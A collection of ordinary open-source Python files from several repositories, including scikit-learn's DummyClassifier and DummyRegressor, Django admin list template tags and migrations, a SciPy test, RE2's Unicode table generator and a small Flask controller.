'price': ('django.db.models.fields.DecimalField', [], {'default': "'0.00'", 'max_digits': '12', 'decimal_places': '2'})
}
}
complete_apps = ['shop_simplevariations']
|
pkats15/hdt_analyzer
|
refs/heads/master
|
django_test/django_venv/Lib/site-packages/pip/_vendor/requests/packages/chardet/compat.py
|
2942
|
######################## BEGIN LICENSE BLOCK ########################
# Contributor(s):
# Ian Cordasco - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import sys
if sys.version_info < (3, 0):
base_str = (str, unicode)
else:
base_str = (bytes, str)
def wrap_ord(a):
if sys.version_info < (3, 0) and isinstance(a, base_str):
return ord(a)
else:
return a
|
qPCR4vir/orange3
|
refs/heads/master
|
Orange/statistics/tests.py
|
18
|
import math
import numpy as np
import scipy
def wilcoxon_rank_sum(d1, d2):
# TODO Check this function!!!
N1, N2 = np.sum(d1[1, :]), np.sum(d2[1, :])
ni1, ni2 = d1.shape[1], d2.shape[1]
i1 = i2 = 0
R = 0
rank = 0
while i1 < ni1 and i2 < ni2:
if d1[0, i1] < d2[0, i2]:
R += (rank + (d1[1, i1] - 1) / 2) * d1[1, i1]
rank += d1[1, i1]
i1 += 1
elif d1[0, i1] == d2[0, i2]:
br = d1[1, i1] + d2[1, i2]
R += (rank + (br - 1) / 2) * d1[1, i1]
rank += br
i1 += 1
i2 += 1
else:
rank += d2[1, i2]
i2 += 1
if i1 < ni1:
s = np.sum(d1[1, i1:])
R += (rank + (s - 1) / 2) * s
U = R - N1 * (N1 + 1) / 2
m = N1 * N2 / 2
var = m * (N1 + N2 + 1) / 6
z = abs(U - m) / math.sqrt(var)
p = 2 * (1 - scipy.special.ndtr(z))
return z, p
|
arabenjamin/scikit-learn
|
refs/heads/master
|
sklearn/dummy.py
|
208
|
# Author: Mathieu Blondel <[email protected]>
# Arnaud Joly <[email protected]>
# Maheshakya Wijewardena <[email protected]>
# License: BSD 3 clause
from __future__ import division
import warnings
import numpy as np
import scipy.sparse as sp
from .base import BaseEstimator, ClassifierMixin, RegressorMixin
from .utils import check_random_state
from .utils.validation import check_array
from .utils.validation import check_consistent_length
from .utils.random import random_choice_csc
from .utils.stats import _weighted_percentile
from .utils.multiclass import class_distribution
class DummyClassifier(BaseEstimator, ClassifierMixin):
"""
DummyClassifier is a classifier that makes predictions using simple rules.
This classifier is useful as a simple baseline to compare with other
(real) classifiers. Do not use it for real problems.
Read more in the :ref:`User Guide <dummy_estimators>`.
Parameters
----------
strategy : str
Strategy to use to generate predictions.
* "stratified": generates predictions by respecting the training
set's class distribution.
* "most_frequent": always predicts the most frequent label in the
training set.
* "prior": always predicts the class that maximizes the class prior
(like "most_frequent") and ``predict_proba`` returns the class prior.
* "uniform": generates predictions uniformly at random.
* "constant": always predicts a constant label that is provided by
the user. This is useful for metrics that evaluate a non-majority
class
random_state : int seed, RandomState instance, or None (default)
The seed of the pseudo random number generator to use.
constant : int or str or array of shape = [n_outputs]
The explicit constant as predicted by the "constant" strategy. This
parameter is useful only for the "constant" strategy.
Attributes
----------
classes_ : array or list of array of shape = [n_classes]
Class labels for each output.
n_classes_ : array or list of array of shape = [n_classes]
Number of label for each output.
class_prior_ : array or list of array of shape = [n_classes]
Probability of each class for each output.
n_outputs_ : int,
Number of outputs.
outputs_2d_ : bool,
True if the output at fit is 2d, else false.
sparse_output_ : bool,
True if the array returned from predict is to be in sparse CSC format.
Is automatically set to True if the input y is passed in sparse format.
"""
def __init__(self, strategy="stratified", random_state=None,
constant=None):
self.strategy = strategy
self.random_state = random_state
self.constant = constant
def fit(self, X, y, sample_weight=None):
"""Fit the random classifier.
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Training vectors, where n_samples is the number of samples
and n_features is the number of features.
y : array-like, shape = [n_samples] or [n_samples, n_outputs]
Target values.
sample_weight : array-like of shape = [n_samples], optional
Sample weights.
Returns
-------
self : object
Returns self.
"""
if self.strategy not in ("most_frequent", "stratified", "uniform",
"constant", "prior"):
raise ValueError("Unknown strategy type.")
if self.strategy == "uniform" and sp.issparse(y):
y = y.toarray()
warnings.warn('A local copy of the target data has been converted '
'to a numpy array. Predicting on sparse target data '
'with the uniform strategy would not save memory '
'and would be slower.',
UserWarning)
self.sparse_output_ = sp.issparse(y)
if not self.sparse_output_:
y = np.atleast_1d(y)
self.output_2d_ = y.ndim == 2
if y.ndim == 1:
y = np.reshape(y, (-1, 1))
self.n_outputs_ = y.shape[1]
if self.strategy == "constant":
if self.constant is None:
raise ValueError("Constant target value has to be specified "
"when the constant strategy is used.")
else:
constant = np.reshape(np.atleast_1d(self.constant), (-1, 1))
if constant.shape[0] != self.n_outputs_:
raise ValueError("Constant target value should have "
"shape (%d, 1)." % self.n_outputs_)
(self.classes_,
self.n_classes_,
self.class_prior_) = class_distribution(y, sample_weight)
if (self.strategy == "constant" and
any(constant[k] not in self.classes_[k]
for k in range(self.n_outputs_))):
# Checking in case of constant strategy if the constant
# provided by the user is in y.
raise ValueError("The constant target value must be "
"present in training data")
if self.n_outputs_ == 1 and not self.output_2d_:
self.n_classes_ = self.n_classes_[0]
self.classes_ = self.classes_[0]
self.class_prior_ = self.class_prior_[0]
return self
def predict(self, X):
"""Perform classification on test vectors X.
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Input vectors, where n_samples is the number of samples
and n_features is the number of features.
Returns
-------
y : array, shape = [n_samples] or [n_samples, n_outputs]
Predicted target values for X.
"""
if not hasattr(self, "classes_"):
raise ValueError("DummyClassifier not fitted.")
X = check_array(X, accept_sparse=['csr', 'csc', 'coo'])
# numpy random_state expects Python int and not long as size argument
# under Windows
n_samples = int(X.shape[0])
rs = check_random_state(self.random_state)
n_classes_ = self.n_classes_
classes_ = self.classes_
class_prior_ = self.class_prior_
constant = self.constant
if self.n_outputs_ == 1:
# Get same type even for self.n_outputs_ == 1
n_classes_ = [n_classes_]
classes_ = [classes_]
class_prior_ = [class_prior_]
constant = [constant]
# Compute probability only once
if self.strategy == "stratified":
proba = self.predict_proba(X)
if self.n_outputs_ == 1:
proba = [proba]
if self.sparse_output_:
class_prob = None
if self.strategy in ("most_frequent", "prior"):
classes_ = [np.array([cp.argmax()]) for cp in class_prior_]
elif self.strategy == "stratified":
class_prob = class_prior_
elif self.strategy == "uniform":
raise ValueError("Sparse target prediction is not "
"supported with the uniform strategy")
elif self.strategy == "constant":
classes_ = [np.array([c]) for c in constant]
y = random_choice_csc(n_samples, classes_, class_prob,
self.random_state)
else:
if self.strategy in ("most_frequent", "prior"):
y = np.tile([classes_[k][class_prior_[k].argmax()] for
k in range(self.n_outputs_)], [n_samples, 1])
elif self.strategy == "stratified":
y = np.vstack(classes_[k][proba[k].argmax(axis=1)] for
k in range(self.n_outputs_)).T
elif self.strategy == "uniform":
ret = [classes_[k][rs.randint(n_classes_[k], size=n_samples)]
for k in range(self.n_outputs_)]
y = np.vstack(ret).T
elif self.strategy == "constant":
y = np.tile(self.constant, (n_samples, 1))
if self.n_outputs_ == 1 and not self.output_2d_:
y = np.ravel(y)
return y
def predict_proba(self, X):
"""
Return probability estimates for the test vectors X.
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Input vectors, where n_samples is the number of samples
and n_features is the number of features.
Returns
-------
P : array-like or list of array-lke of shape = [n_samples, n_classes]
Returns the probability of the sample for each class in
the model, where classes are ordered arithmetically, for each
output.
"""
if not hasattr(self, "classes_"):
raise ValueError("DummyClassifier not fitted.")
X = check_array(X, accept_sparse=['csr', 'csc', 'coo'])
# numpy random_state expects Python int and not long as size argument
# under Windows
n_samples = int(X.shape[0])
rs = check_random_state(self.random_state)
n_classes_ = self.n_classes_
classes_ = self.classes_
class_prior_ = self.class_prior_
constant = self.constant
if self.n_outputs_ == 1 and not self.output_2d_:
# Get same type even for self.n_outputs_ == 1
n_classes_ = [n_classes_]
classes_ = [classes_]
class_prior_ = [class_prior_]
constant = [constant]
P = []
for k in range(self.n_outputs_):
if self.strategy == "most_frequent":
ind = np.ones(n_samples, dtype=int) * class_prior_[k].argmax()
out = np.zeros((n_samples, n_classes_[k]), dtype=np.float64)
out[:, ind] = 1.0
elif self.strategy == "prior":
out = np.ones((n_samples, 1)) * class_prior_[k]
elif self.strategy == "stratified":
out = rs.multinomial(1, class_prior_[k], size=n_samples)
elif self.strategy == "uniform":
out = np.ones((n_samples, n_classes_[k]), dtype=np.float64)
out /= n_classes_[k]
elif self.strategy == "constant":
ind = np.where(classes_[k] == constant[k])
out = np.zeros((n_samples, n_classes_[k]), dtype=np.float64)
out[:, ind] = 1.0
P.append(out)
if self.n_outputs_ == 1 and not self.output_2d_:
P = P[0]
return P
def predict_log_proba(self, X):
"""
Return log probability estimates for the test vectors X.
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Input vectors, where n_samples is the number of samples
and n_features is the number of features.
Returns
-------
P : array-like or list of array-like of shape = [n_samples, n_classes]
Returns the log probability of the sample for each class in
the model, where classes are ordered arithmetically for each
output.
"""
proba = self.predict_proba(X)
if self.n_outputs_ == 1:
return np.log(proba)
else:
return [np.log(p) for p in proba]
class DummyRegressor(BaseEstimator, RegressorMixin):
"""
DummyRegressor is a regressor that makes predictions using
simple rules.
This regressor is useful as a simple baseline to compare with other
(real) regressors. Do not use it for real problems.
Read more in the :ref:`User Guide <dummy_estimators>`.
Parameters
----------
strategy : str
Strategy to use to generate predictions.
* "mean": always predicts the mean of the training set
* "median": always predicts the median of the training set
* "quantile": always predicts a specified quantile of the training set,
provided with the quantile parameter.
* "constant": always predicts a constant value that is provided by
the user.
constant : int or float or array of shape = [n_outputs]
The explicit constant as predicted by the "constant" strategy. This
parameter is useful only for the "constant" strategy.
quantile : float in [0.0, 1.0]
The quantile to predict using the "quantile" strategy. A quantile of
0.5 corresponds to the median, while 0.0 to the minimum and 1.0 to the
maximum.
Attributes
----------
constant_ : float or array of shape [n_outputs]
Mean or median or quantile of the training targets or constant value
given by the user.
n_outputs_ : int,
Number of outputs.
outputs_2d_ : bool,
True if the output at fit is 2d, else false.
"""
def __init__(self, strategy="mean", constant=None, quantile=None):
self.strategy = strategy
self.constant = constant
self.quantile = quantile
def fit(self, X, y, sample_weight=None):
"""Fit the random regressor.
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Training vectors, where n_samples is the number of samples
and n_features is the number of features.
y : array-like, shape = [n_samples] or [n_samples, n_outputs]
Target values.
sample_weight : array-like of shape = [n_samples], optional
Sample weights.
Returns
-------
self : object
Returns self.
"""
if self.strategy not in ("mean", "median", "quantile", "constant"):
raise ValueError("Unknown strategy type: %s, expected "
"'mean', 'median', 'quantile' or 'constant'"
% self.strategy)
y = check_array(y, ensure_2d=False)
if len(y) == 0:
raise ValueError("y must not be empty.")
self.output_2d_ = y.ndim == 2
if y.ndim == 1:
y = np.reshape(y, (-1, 1))
self.n_outputs_ = y.shape[1]
check_consistent_length(X, y, sample_weight)
if self.strategy == "mean":
self.constant_ = np.average(y, axis=0, weights=sample_weight)
elif self.strategy == "median":
if sample_weight is None:
self.constant_ = np.median(y, axis=0)
else:
self.constant_ = [_weighted_percentile(y[:, k], sample_weight,
percentile=50.)
for k in range(self.n_outputs_)]
elif self.strategy == "quantile":
if self.quantile is None or not np.isscalar(self.quantile):
raise ValueError("Quantile must be a scalar in the range "
"[0.0, 1.0], but got %s." % self.quantile)
percentile = self.quantile * 100.0
if sample_weight is None:
self.constant_ = np.percentile(y, axis=0, q=percentile)
else:
self.constant_ = [_weighted_percentile(y[:, k], sample_weight,
percentile=percentile)
for k in range(self.n_outputs_)]
elif self.strategy == "constant":
if self.constant is None:
raise TypeError("Constant target value has to be specified "
"when the constant strategy is used.")
self.constant = check_array(self.constant,
accept_sparse=['csr', 'csc', 'coo'],
ensure_2d=False, ensure_min_samples=0)
if self.output_2d_ and self.constant.shape[0] != y.shape[1]:
raise ValueError(
"Constant target value should have "
"shape (%d, 1)." % y.shape[1])
self.constant_ = self.constant
self.constant_ = np.reshape(self.constant_, (1, -1))
return self
def predict(self, X):
"""
Perform classification on test vectors X.
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Input vectors, where n_samples is the number of samples
and n_features is the number of features.
Returns
-------
y : array, shape = [n_samples] or [n_samples, n_outputs]
Predicted target values for X.
"""
if not hasattr(self, "constant_"):
raise ValueError("DummyRegressor not fitted.")
X = check_array(X, accept_sparse=['csr', 'csc', 'coo'])
n_samples = X.shape[0]
y = np.ones((n_samples, 1)) * self.constant_
if self.n_outputs_ == 1 and not self.output_2d_:
y = np.ravel(y)
return y
|
ElBell/VTDairyDB
|
refs/heads/master
|
controllers/__init__.py
|
1
|
__author__ = 'Eleonor Bart'
from main import app
from flask import session, g, send_from_directory, request, jsonify, render_template
from flask import url_for, redirect
@app.route('/')
def homepage():
return render_template('homepage.html')
@app.route("/site-map", methods=['GET', 'POST'])
def site_map():
import urllib
output = []
for rule in app.url_map.iter_rules():
options = {}
for arg in rule.arguments:
options[arg] = "[{0}]".format(arg)
methods = ','.join(rule.methods)
try:
url = url_for(rule.endpoint, **options)
except:
url = "Unknown error"
line = urllib.unquote("<td>{:50s}</td><td>{:20s}</td><td>{}</td>".format(rule.endpoint, methods, url))
output.append(line)
return "<table><tr>{}</tr></table>".format("</tr><tr>".join(sorted(output)))
#
from admin import admin
import security
import cow
import uploads
import life_data
import growth_data
import filter
import add_user
|
mammique/django
|
refs/heads/tp_alpha
|
django/contrib/admin/templatetags/admin_list.py
|
103
|
from __future__ import unicode_literals
import datetime
from django.contrib.admin.util import (lookup_field, display_for_field,
display_for_value, label_for_field)
from django.contrib.admin.views.main import (ALL_VAR, EMPTY_CHANGELIST_VALUE,
ORDER_VAR, PAGE_VAR, SEARCH_VAR)
from django.contrib.admin.templatetags.admin_static import static
from django.core.exceptions import ObjectDoesNotExist
from django.db import models
from django.utils import formats
from django.utils.html import format_html
from django.utils.safestring import mark_safe
from django.utils import six
from django.utils.text import capfirst
from django.utils.translation import ugettext as _
from django.utils.encoding import smart_text, force_text
from django.template import Library
from django.template.loader import get_template
from django.template.context import Context
register = Library()
DOT = '.'
@register.simple_tag
def paginator_number(cl,i):
"""
Generates an individual page index link in a paginated list.
"""
if i == DOT:
return '... '
elif i == cl.page_num:
return format_html('<span class="this-page">{0}</span> ', i+1)
else:
return format_html('<a href="{0}"{1}>{2}</a> ',
cl.get_query_string({PAGE_VAR: i}),
mark_safe(' class="end"' if i == cl.paginator.num_pages-1 else ''),
i+1)
@register.inclusion_tag('admin/pagination.html')
def pagination(cl):
"""
Generates the series of links to the pages in a paginated list.
"""
paginator, page_num = cl.paginator, cl.page_num
pagination_required = (not cl.show_all or not cl.can_show_all) and cl.multi_page
if not pagination_required:
page_range = []
else:
ON_EACH_SIDE = 3
ON_ENDS = 2
# If there are 10 or fewer pages, display links to every page.
# Otherwise, do some fancy
if paginator.num_pages <= 10:
page_range = range(paginator.num_pages)
else:
# Insert "smart" pagination links, so that there are always ON_ENDS
# links at either end of the list of pages, and there are always
# ON_EACH_SIDE links at either end of the "current page" link.
page_range = []
if page_num > (ON_EACH_SIDE + ON_ENDS):
page_range.extend(range(0, ON_EACH_SIDE - 1))
page_range.append(DOT)
page_range.extend(range(page_num - ON_EACH_SIDE, page_num + 1))
else:
page_range.extend(range(0, page_num + 1))
if page_num < (paginator.num_pages - ON_EACH_SIDE - ON_ENDS - 1):
page_range.extend(range(page_num + 1, page_num + ON_EACH_SIDE + 1))
page_range.append(DOT)
page_range.extend(range(paginator.num_pages - ON_ENDS, paginator.num_pages))
else:
page_range.extend(range(page_num + 1, paginator.num_pages))
need_show_all_link = cl.can_show_all and not cl.show_all and cl.multi_page
return {
'cl': cl,
'pagination_required': pagination_required,
'show_all_url': need_show_all_link and cl.get_query_string({ALL_VAR: ''}),
'page_range': page_range,
'ALL_VAR': ALL_VAR,
'1': 1,
}
def result_headers(cl):
"""
Generates the list column headers.
"""
ordering_field_columns = cl.get_ordering_field_columns()
for i, field_name in enumerate(cl.list_display):
text, attr = label_for_field(field_name, cl.model,
model_admin = cl.model_admin,
return_attr = True
)
if attr:
# Potentially not sortable
# if the field is the action checkbox: no sorting and special class
if field_name == 'action_checkbox':
yield {
"text": text,
"class_attrib": mark_safe(' class="action-checkbox-column"'),
"sortable": False,
}
continue
admin_order_field = getattr(attr, "admin_order_field", None)
if not admin_order_field:
# Not sortable
yield {
"text": text,
"sortable": False,
}
continue
# OK, it is sortable if we got this far
th_classes = ['sortable']
order_type = ''
new_order_type = 'asc'
sort_priority = 0
sorted = False
# Is it currently being sorted on?
if i in ordering_field_columns:
sorted = True
order_type = ordering_field_columns.get(i).lower()
sort_priority = list(ordering_field_columns).index(i) + 1
th_classes.append('sorted %sending' % order_type)
new_order_type = {'asc': 'desc', 'desc': 'asc'}[order_type]
# build new ordering param
o_list_primary = [] # URL for making this field the primary sort
o_list_remove = [] # URL for removing this field from sort
o_list_toggle = [] # URL for toggling order type for this field
make_qs_param = lambda t, n: ('-' if t == 'desc' else '') + str(n)
for j, ot in ordering_field_columns.items():
if j == i: # Same column
param = make_qs_param(new_order_type, j)
# We want clicking on this header to bring the ordering to the
# front
o_list_primary.insert(0, param)
o_list_toggle.append(param)
# o_list_remove - omit
else:
param = make_qs_param(ot, j)
o_list_primary.append(param)
o_list_toggle.append(param)
o_list_remove.append(param)
if i not in ordering_field_columns:
o_list_primary.insert(0, make_qs_param(new_order_type, i))
yield {
"text": text,
"sortable": True,
"sorted": sorted,
"ascending": order_type == "asc",
"sort_priority": sort_priority,
"url_primary": cl.get_query_string({ORDER_VAR: '.'.join(o_list_primary)}),
"url_remove": cl.get_query_string({ORDER_VAR: '.'.join(o_list_remove)}),
"url_toggle": cl.get_query_string({ORDER_VAR: '.'.join(o_list_toggle)}),
"class_attrib": format_html(' class="{0}"', ' '.join(th_classes))
if th_classes else '',
}
def _boolean_icon(field_val):
icon_url = static('admin/img/icon-%s.gif' %
{True: 'yes', False: 'no', None: 'unknown'}[field_val])
return format_html('<img src="{0}" alt="{1}" />', icon_url, field_val)
def items_for_result(cl, result, form):
"""
Generates the actual list of data.
"""
first = True
pk = cl.lookup_opts.pk.attname
for field_name in cl.list_display:
row_class = ''
try:
f, attr, value = lookup_field(field_name, result, cl.model_admin)
except ObjectDoesNotExist:
result_repr = EMPTY_CHANGELIST_VALUE
else:
if f is None:
if field_name == 'action_checkbox':
row_class = mark_safe(' class="action-checkbox"')
allow_tags = getattr(attr, 'allow_tags', False)
boolean = getattr(attr, 'boolean', False)
if boolean:
allow_tags = True
result_repr = display_for_value(value, boolean)
# Strip HTML tags in the resulting text, except if the
# function has an "allow_tags" attribute set to True.
if allow_tags:
result_repr = mark_safe(result_repr)
if isinstance(value, (datetime.date, datetime.time)):
row_class = mark_safe(' class="nowrap"')
else:
if isinstance(f.rel, models.ManyToOneRel):
field_val = getattr(result, f.name)
if field_val is None:
result_repr = EMPTY_CHANGELIST_VALUE
else:
result_repr = field_val
else:
result_repr = display_for_field(value, f)
if isinstance(f, (models.DateField, models.TimeField, models.ForeignKey)):
row_class = mark_safe(' class="nowrap"')
if force_text(result_repr) == '':
result_repr = mark_safe(' ')
# If list_display_links not defined, add the link tag to the first field
if (first and not cl.list_display_links) or field_name in cl.list_display_links:
table_tag = {True:'th', False:'td'}[first]
first = False
url = cl.url_for_result(result)
# Convert the pk to something that can be used in Javascript.
# Problem cases are long ints (23L) and non-ASCII strings.
if cl.to_field:
attr = str(cl.to_field)
else:
attr = pk
value = result.serializable_value(attr)
result_id = repr(force_text(value))[1:]
yield format_html('<{0}{1}><a href="{2}"{3}>{4}</a></{5}>',
table_tag,
row_class,
url,
format_html(' onclick="opener.dismissRelatedLookupPopup(window, {0}); return false;"', result_id)
if cl.is_popup else '',
result_repr,
table_tag)
else:
# By default the fields come from ModelAdmin.list_editable, but if we pull
# the fields out of the form instead of list_editable custom admins
# can provide fields on a per request basis
if (form and field_name in form.fields and not (
field_name == cl.model._meta.pk.name and
form[cl.model._meta.pk.name].is_hidden)):
bf = form[field_name]
result_repr = mark_safe(force_text(bf.errors) + force_text(bf))
yield format_html('<td{0}>{1}</td>', row_class, result_repr)
if form and not form[cl.model._meta.pk.name].is_hidden:
yield format_html('<td>{0}</td>', force_text(form[cl.model._meta.pk.name]))
class ResultList(list):
# Wrapper class used to return items in a list_editable
# changelist, annotated with the form object for error
# reporting purposes. Needed to maintain backwards
# compatibility with existing admin templates.
def __init__(self, form, *items):
self.form = form
super(ResultList, self).__init__(*items)
def results(cl):
if cl.formset:
for res, form in zip(cl.result_list, cl.formset.forms):
yield ResultList(form, items_for_result(cl, res, form))
else:
for res in cl.result_list:
yield ResultList(None, items_for_result(cl, res, None))
def result_hidden_fields(cl):
if cl.formset:
for res, form in zip(cl.result_list, cl.formset.forms):
if form[cl.model._meta.pk.name].is_hidden:
yield mark_safe(force_text(form[cl.model._meta.pk.name]))
@register.inclusion_tag("admin/change_list_results.html")
def result_list(cl):
"""
Displays the headers and data list together
"""
headers = list(result_headers(cl))
num_sorted_fields = 0
for h in headers:
if h['sortable'] and h['sorted']:
num_sorted_fields += 1
return {'cl': cl,
'result_hidden_fields': list(result_hidden_fields(cl)),
'result_headers': headers,
'num_sorted_fields': num_sorted_fields,
'results': list(results(cl))}
@register.inclusion_tag('admin/date_hierarchy.html')
def date_hierarchy(cl):
"""
Displays the date hierarchy for date drill-down functionality.
"""
if cl.date_hierarchy:
field_name = cl.date_hierarchy
year_field = '%s__year' % field_name
month_field = '%s__month' % field_name
day_field = '%s__day' % field_name
field_generic = '%s__' % field_name
year_lookup = cl.params.get(year_field)
month_lookup = cl.params.get(month_field)
day_lookup = cl.params.get(day_field)
link = lambda d: cl.get_query_string(d, [field_generic])
if not (year_lookup or month_lookup or day_lookup):
# select appropriate start level
date_range = cl.query_set.aggregate(first=models.Min(field_name),
last=models.Max(field_name))
if date_range['first'] and date_range['last']:
if date_range['first'].year == date_range['last'].year:
year_lookup = date_range['first'].year
if date_range['first'].month == date_range['last'].month:
month_lookup = date_range['first'].month
if year_lookup and month_lookup and day_lookup:
day = datetime.date(int(year_lookup), int(month_lookup), int(day_lookup))
return {
'show': True,
'back': {
'link': link({year_field: year_lookup, month_field: month_lookup}),
'title': capfirst(formats.date_format(day, 'YEAR_MONTH_FORMAT'))
},
'choices': [{'title': capfirst(formats.date_format(day, 'MONTH_DAY_FORMAT'))}]
}
elif year_lookup and month_lookup:
days = cl.query_set.filter(**{year_field: year_lookup, month_field: month_lookup}).dates(field_name, 'day')
return {
'show': True,
'back': {
'link': link({year_field: year_lookup}),
'title': str(year_lookup)
},
'choices': [{
'link': link({year_field: year_lookup, month_field: month_lookup, day_field: day.day}),
'title': capfirst(formats.date_format(day, 'MONTH_DAY_FORMAT'))
} for day in days]
}
elif year_lookup:
months = cl.query_set.filter(**{year_field: year_lookup}).dates(field_name, 'month')
return {
'show' : True,
'back': {
'link' : link({}),
'title': _('All dates')
},
'choices': [{
'link': link({year_field: year_lookup, month_field: month.month}),
'title': capfirst(formats.date_format(month, 'YEAR_MONTH_FORMAT'))
} for month in months]
}
else:
years = cl.query_set.dates(field_name, 'year')
return {
'show': True,
'choices': [{
'link': link({year_field: str(year.year)}),
'title': str(year.year),
} for year in years]
}
@register.inclusion_tag('admin/search_form.html')
def search_form(cl):
"""
Displays a search form for searching the list.
"""
return {
'cl': cl,
'show_result_count': cl.result_count != cl.full_result_count,
'search_var': SEARCH_VAR
}
@register.simple_tag
def admin_list_filter(cl, spec):
tpl = get_template(spec.template)
return tpl.render(Context({
'title': spec.title,
'choices' : list(spec.choices(cl)),
'spec': spec,
}))
@register.inclusion_tag('admin/actions.html', takes_context=True)
def admin_actions(context):
"""
Track the number of times the action field has been rendered on the page,
so we know which value to use.
"""
context['action_index'] = context.get('action_index', -1) + 1
return context
|
gdi2290/rethinkdb
|
refs/heads/next
|
external/re2_20140111/re2/make_unicode_groups.py
|
121
|
#!/usr/bin/python
# Copyright 2008 The RE2 Authors. All Rights Reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
"""Generate C++ tables for Unicode Script and Category groups."""
import sys
import unicode
_header = """
// GENERATED BY make_unicode_groups.py; DO NOT EDIT.
// make_unicode_groups.py >unicode_groups.cc
#include "re2/unicode_groups.h"
namespace re2 {
"""
_trailer = """
} // namespace re2
"""
n16 = 0
n32 = 0
def MakeRanges(codes):
"""Turn a list like [1,2,3,7,8,9] into a range list [[1,3], [7,9]]"""
ranges = []
last = -100
for c in codes:
if c == last+1:
ranges[-1][1] = c
else:
ranges.append([c, c])
last = c
return ranges
def PrintRanges(type, name, ranges):
"""Print the ranges as an array of type named name."""
print "static const %s %s[] = {" % (type, name,)
for lo, hi in ranges:
print "\t{ %d, %d }," % (lo, hi)
print "};"
# def PrintCodes(type, name, codes):
# """Print the codes as an array of type named name."""
# print "static %s %s[] = {" % (type, name,)
# for c in codes:
# print "\t%d," % (c,)
# print "};"
def PrintGroup(name, codes):
"""Print the data structures for the group of codes.
Return a UGroup literal for the group."""
# See unicode_groups.h for a description of the data structure.
# Split codes into 16-bit ranges and 32-bit ranges.
range16 = MakeRanges([c for c in codes if c < 65536])
range32 = MakeRanges([c for c in codes if c >= 65536])
# Pull singleton ranges out of range16.
# code16 = [lo for lo, hi in range16 if lo == hi]
# range16 = [[lo, hi] for lo, hi in range16 if lo != hi]
global n16
global n32
n16 += len(range16)
n32 += len(range32)
ugroup = "{ \"%s\", +1" % (name,)
# if len(code16) > 0:
# PrintCodes("uint16", name+"_code16", code16)
# ugroup += ", %s_code16, %d" % (name, len(code16))
# else:
# ugroup += ", 0, 0"
if len(range16) > 0:
PrintRanges("URange16", name+"_range16", range16)
ugroup += ", %s_range16, %d" % (name, len(range16))
else:
ugroup += ", 0, 0"
if len(range32) > 0:
PrintRanges("URange32", name+"_range32", range32)
ugroup += ", %s_range32, %d" % (name, len(range32))
else:
ugroup += ", 0, 0"
ugroup += " }"
return ugroup
def main():
print _header
ugroups = []
for name, codes in unicode.Categories().iteritems():
ugroups.append(PrintGroup(name, codes))
for name, codes in unicode.Scripts().iteritems():
ugroups.append(PrintGroup(name, codes))
print "// %d 16-bit ranges, %d 32-bit ranges" % (n16, n32)
print "const UGroup unicode_groups[] = {";
ugroups.sort()
for ug in ugroups:
print "\t%s," % (ug,)
print "};"
print "const int num_unicode_groups = %d;" % (len(ugroups),)
print _trailer
if __name__ == '__main__':
main()
|
uranusjr/django
|
refs/heads/master
|
django/contrib/auth/migrations/0004_alter_user_username_opts.py
|
134
|
from django.contrib.auth import validators
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('auth', '0003_alter_user_email_max_length'),
]
# No database changes; modifies validators and error_messages (#13147).
operations = [
migrations.AlterField(
model_name='user',
name='username',
field=models.CharField(
error_messages={'unique': 'A user with that username already exists.'}, max_length=30,
validators=[validators.UnicodeUsernameValidator()],
help_text='Required. 30 characters or fewer. Letters, digits and @/./+/-/_ only.',
unique=True, verbose_name='username'
),
),
]
|
anntzer/scipy
|
refs/heads/master
|
scipy/special/tests/test_spfun_stats.py
|
12
|
import numpy as np
from numpy.testing import (assert_array_equal,
assert_array_almost_equal_nulp, assert_almost_equal)
from pytest import raises as assert_raises
from scipy.special import gammaln, multigammaln
class TestMultiGammaLn:
def test1(self):
# A test of the identity
# Gamma_1(a) = Gamma(a)
np.random.seed(1234)
a = np.abs(np.random.randn())
assert_array_equal(multigammaln(a, 1), gammaln(a))
def test2(self):
# A test of the identity
# Gamma_2(a) = sqrt(pi) * Gamma(a) * Gamma(a - 0.5)
a = np.array([2.5, 10.0])
result = multigammaln(a, 2)
expected = np.log(np.sqrt(np.pi)) + gammaln(a) + gammaln(a - 0.5)
assert_almost_equal(result, expected)
def test_bararg(self):
assert_raises(ValueError, multigammaln, 0.5, 1.2)
def _check_multigammaln_array_result(a, d):
# Test that the shape of the array returned by multigammaln
# matches the input shape, and that all the values match
# the value computed when multigammaln is called with a scalar.
result = multigammaln(a, d)
assert_array_equal(a.shape, result.shape)
a1 = a.ravel()
result1 = result.ravel()
for i in range(a.size):
assert_array_almost_equal_nulp(result1[i], multigammaln(a1[i], d))
def test_multigammaln_array_arg():
# Check that the array returned by multigammaln has the correct
# shape and contains the correct values. The cases have arrays
# with several differnent shapes.
# The cases include a regression test for ticket #1849
# (a = np.array([2.0]), an array with a single element).
np.random.seed(1234)
cases = [
# a, d
(np.abs(np.random.randn(3, 2)) + 5, 5),
(np.abs(np.random.randn(1, 2)) + 5, 5),
(np.arange(10.0, 18.0).reshape(2, 2, 2), 3),
(np.array([2.0]), 3),
(np.float64(2.0), 3),
]
for a, d in cases:
_check_multigammaln_array_result(a, d)
|
Jiangshangmin/mpld3
|
refs/heads/master
|
doc/sphinxext/numpy_ext/numpydoc.py
|
50
|
"""
========
numpydoc
========
Sphinx extension that handles docstrings in the Numpy standard format. [1]
It will:
- Convert Parameters etc. sections to field lists.
- Convert See Also section to a See also entry.
- Renumber references.
- Extract the signature from the docstring, if it can't be determined otherwise.
.. [1] http://projects.scipy.org/numpy/wiki/CodingStyleGuidelines#docstring-standard
"""
import os, re, pydoc
from docscrape_sphinx import get_doc_object, SphinxDocString
